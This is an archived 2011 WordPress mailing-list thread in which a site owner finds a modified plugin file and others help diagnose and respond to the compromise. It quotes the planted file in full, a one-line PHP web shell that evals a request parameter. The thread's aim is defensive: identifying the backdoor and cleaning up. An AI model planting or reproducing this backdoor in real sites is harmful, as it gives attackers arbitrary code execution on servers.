[wp-hackers] Possible Exploit

Simon Prosser pross at pross.org.uk
Sun Jun 12 15:19:20 UTC 2011


You should have eval() disabled in php.ini

On 12 June 2011 14:05, Charles Frees-Melvin <wordpress at cefm.ca> wrote:

> That is quite common. Many attacks are from other non-secure sites on the
> same server.
>
> --
> Charles E. Frees-Melvin
> www.cefm.ca
>
> On 2011-06-12, at 10:00, Baki Goxhaj <banago at gmail.com> wrote:
>
> > Wrote to my hosting account. This is what they are saying:
> >
> > Due to the clustered structure of our systems there is no single log file
> >> for you to use as your site is served by many servers.I would suggest
> you to
> >> please make a full audit of your account in that regards and remove the
> >> malicious code if you find any.
> >>
> >
> > Crazy - I have like 15 websites on there.
> >
> > Kindly,
> >
> > Baki Goxhaj
> > www.wplancer.com | proverbhunter.com | www.banago.info<
> http://proverbhunter.com>
> >
> >
> > On Sun, Jun 12, 2011 at 2:14 PM, Dion Hulse (dd32) <wordpress at dd32.id.au
> >wrote:
> >
> >> Check your access logs for strange requests at the time the file was
> >> detected,  You'll hopefully be able to see a POST request to one of the
> >> plugin files at that point in time, or perhaps a long GET request, if
> you
> >> can narrow down the file attacked, you can work out which plugin has the
> >> vulnerability in it..
> >>
> >> On 12 June 2011 21:59, Baki Goxhaj <banago at gmail.com> wrote:
> >>
> >>> I removed it as soon I found out about it. I hope my other installs are
> >> not
> >>> infected as I don't have the file monitor running there.
> >>>
> >>> Kindly,
> >>>
> >>> Baki Goxhaj
> >>> www.wplancer.com | proverbhunter.com | www.banago.info<
> >>> http://proverbhunter.com>
> >>>
> >>>
> >>> On Sun, Jun 12, 2011 at 1:56 PM, Jon Cave <jon at lionsgoroar.co.uk>
> wrote:
> >>>
> >>>> n Sun, Jun 12, 2011 at 12:45 PM, Baki Goxhaj <banago at gmail.com>
> wrote:
> >>>>> Just got an email from my file monitor plugin that a file had been
> >>>> changed -
> >>>>> it is an inactive plugin file, strangely enough. Here is the content
> >> of
> >>>> the
> >>>>> file now:
> >>>>>
> >>>>> <?php
> >> if(isset($_REQUEST['asc']))eval(stripslashes($_REQUEST['asc']));
> >>> ?>
> >>>>>
> >>>>> Is this something dangerous?
> >>>>
> >>>> Yes this is extremely dangerous. It's basically a backdoor to allow
> >>>> arbitrary PHP code execution on your server. You should remove that
> >>>> code immediately, change passwords, do a full cleanup, etc.
> >>>> _______________________________________________
> >>>> wp-hackers mailing list
> >>>> wp-hackers at lists.automattic.com
> >>>> http://lists.automattic.com/mailman/listinfo/wp-hackers
> >>>>
> >>> _______________________________________________
> >>> wp-hackers mailing list
> >>> wp-hackers at lists.automattic.com
> >>> http://lists.automattic.com/mailman/listinfo/wp-hackers
> >>>
> >> _______________________________________________
> >> wp-hackers mailing list
> >> wp-hackers at lists.automattic.com
> >> http://lists.automattic.com/mailman/listinfo/wp-hackers
> >>
> > _______________________________________________
> > wp-hackers mailing list
> > wp-hackers at lists.automattic.com
> > http://lists.automattic.com/mailman/listinfo/wp-hackers
> _______________________________________________
> wp-hackers mailing list
> wp-hackers at lists.automattic.com
> http://lists.automattic.com/mailman/listinfo/wp-hackers
>



-- 
My Blog: http://www.pross.org.uk/
Plugins : http://www.pross.org.uk/plugins/
Themes: http://wordpress.org/extend/themes/profile/pross


More information about the wp-hackers mailing list